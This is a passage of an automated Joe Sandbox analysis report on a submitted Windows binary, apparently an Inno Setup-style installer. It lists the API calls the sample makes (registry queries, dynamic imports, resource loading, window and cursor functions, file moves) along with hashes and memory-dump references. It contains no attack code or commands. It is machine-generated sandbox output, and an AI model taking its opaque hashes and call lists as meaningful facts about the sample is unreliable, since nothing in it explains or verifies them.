                                                                              • API ID: CloseOpen
                                                                              • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                              • API String ID: 47109696-2631785700
                                                                              • Opcode ID: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                              • Instruction ID: 2bdf3aef2c60deecc2fc1a5dc8a42cc53f0a1f71867dabe890c8ddf4abdcbedd
                                                                              • Instruction Fuzzy Hash: 3AF0A4B17001109BDB10EB1AE845F5B628CDBD1316F20403FF581E7296CE7CDC06CA9A
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
                                                                              • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C
                                                                              Strings
                                                                              • CSDVersion, xrefs: 00481F70
                                                                              • System\CurrentControlSet\Control\Windows, xrefs: 00481F46
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                              • API String ID: 3677997916-1910633163
                                                                              • Opcode ID: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                              • Instruction ID: c869957850822339a6d2b86bec0dd1f4db8a349efa053aa20552817ac18695c5
                                                                              • Instruction Fuzzy Hash: 94F01975E4020DAADF10EAD18C45BAF73BCAB04708F104967FB10E7290E779AA45CB5A
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                              • API String ID: 1646373207-4063490227
                                                                              • Opcode ID: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                              • Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
                                                                              • Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                              • API String ID: 1646373207-260599015
                                                                              • Opcode ID: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                              • Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
                                                                              • Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                              • API String ID: 1646373207-834958232
                                                                              • Opcode ID: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                              • Instruction ID: 4607b44a290c0083fd8a3bbebdee3b5c85a8181a3f50ff176a2b10a78ee17b7d
                                                                              • Instruction Fuzzy Hash: 0BB012CA68170450CC1032F28C07E1F1C0C4C80769B1604373C00F10C3CF6CD800483E
                                                                              APIs
                                                                                • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                              • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                              • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                              • API String ID: 2238633743-2683653824
                                                                              • Opcode ID: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                              • Instruction ID: dcd617acd20af11e442c32675adda2be3f923d80830e775180bb661fb25f4313
                                                                              • Opcode Fuzzy Hash: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                              • Instruction Fuzzy Hash: 67B092A0A80780A8DE10BFB3A84390B28248590B1AB20443B30207A093EB7C45145E6F
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D), ref: 0047C3C0
                                                                              • FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D,00000000), ref: 0047C3DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID:
                                                                              • API String ID: 2066263336-0
                                                                              • Opcode ID: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                              • Instruction ID: ee88cb3e7f5f0e7034babd07dab097b82f9cbcdb14299ae6248908863b530e43
                                                                              • Opcode Fuzzy Hash: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                              • Instruction Fuzzy Hash: 5981317090025DAFCF11DFA5CC91ADFBBB9EF49304F5084AAE808A7291D7399A46CF54
                                                                              APIs
                                                                                • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
                                                                                • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
                                                                              • GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CountErrorFileLastMoveTick
                                                                              • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                              • API String ID: 2406187244-2685451598
                                                                              • Opcode ID: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                              • Instruction ID: 473eb97c6ec8267434c8776fb474a14b66813a9beba34573b5150fcc090343b6
                                                                              • Opcode Fuzzy Hash: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                              • Instruction Fuzzy Hash: 79416370A002099FCB10EFA5D882AEE77B4EF89314F518537E504B7395D73C9A05CBA9
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00413D56
                                                                              • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                • Part of subcall function 00418ED0: 6F59C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
                                                                                • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
                                                                              • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CursorDesktopWindow$Show
                                                                              • String ID:
                                                                              • API String ID: 2074268717-0
                                                                              • Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                              • Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
                                                                              • Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                              • Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                              • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                              • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString$FileMessageModuleName
                                                                              • String ID:
                                                                              • API String ID: 704749118-0
                                                                              • Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                              • Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
                                                                              • Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                              • Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
                                                                                • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
                                                                              • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
                                                                                • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                              • IsRectEmpty.USER32(?), ref: 0044E1A7
                                                                              • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                              • String ID:
                                                                              • API String ID: 855768636-0
                                                                              • Opcode ID: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                              • Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
                                                                              • Opcode Fuzzy Hash: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                              • Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399
                                                                              APIs
                                                                              • OffsetRect.USER32(?,?,00000000), ref: 00493DE8
                                                                              • OffsetRect.USER32(?,00000000,?), ref: 00493E03
                                                                              • OffsetRect.USER32(?,?,00000000), ref: 00493E1D
                                                                              • OffsetRect.USER32(?,00000000,?), ref: 00493E38
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: OffsetRect
                                                                              • String ID:
                                                                              • API String ID: 177026234-0
                                                                              • Opcode ID: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                              • Instruction ID: 626cbd3239d4ed1d666785e4d5506dc5f63added092c4cfac4a9a75855a5826e
                                                                              • Opcode Fuzzy Hash: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                              • Instruction Fuzzy Hash: EF217AB6704201AFD700DE69CD85EABBBEEEBC4304F14CA2AF554C7249D634ED0487A6
                                                                              APIs
                                                                              • GetCursorPos.USER32 ref: 00417270
                                                                              • SetCursor.USER32(00000000), ref: 004172B3
                                                                              • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                              • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                              • String ID:
                                                                              • API String ID: 1959210111-0
                                                                              • Opcode ID: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                              • Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
                                                                              • Opcode Fuzzy Hash: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                              • Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89
                                                                              APIs
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00493A97
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                              • Instruction ID: 4fded1b76b16cf5233eb9f491647a43cf70802087f48ea21bc09c20ce05eabc8
                                                                              • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                              • Instruction Fuzzy Hash: D011FE72604204ABCB40DEA9D8C4D9B7BECEF4D364B1541AAF918DB246D674ED408BA8
                                                                              APIs
                                                                              • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                              • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                              • RegisterClassA.USER32(00498598), ref: 0041F4E4
                                                                              • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                              • String ID:
                                                                              • API String ID: 4025006896-0
                                                                              • Opcode ID: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                              • Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
                                                                              • Opcode Fuzzy Hash: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                              • Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                              • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
                                                                              • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
                                                                              • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
• Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
• Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
• Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
APIs
• GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29
Strings
• Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
• Setting NTFS compression on directory: %s, xrefs: 0046EDF7
• Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
Similarity
• API ID: ErrorLast
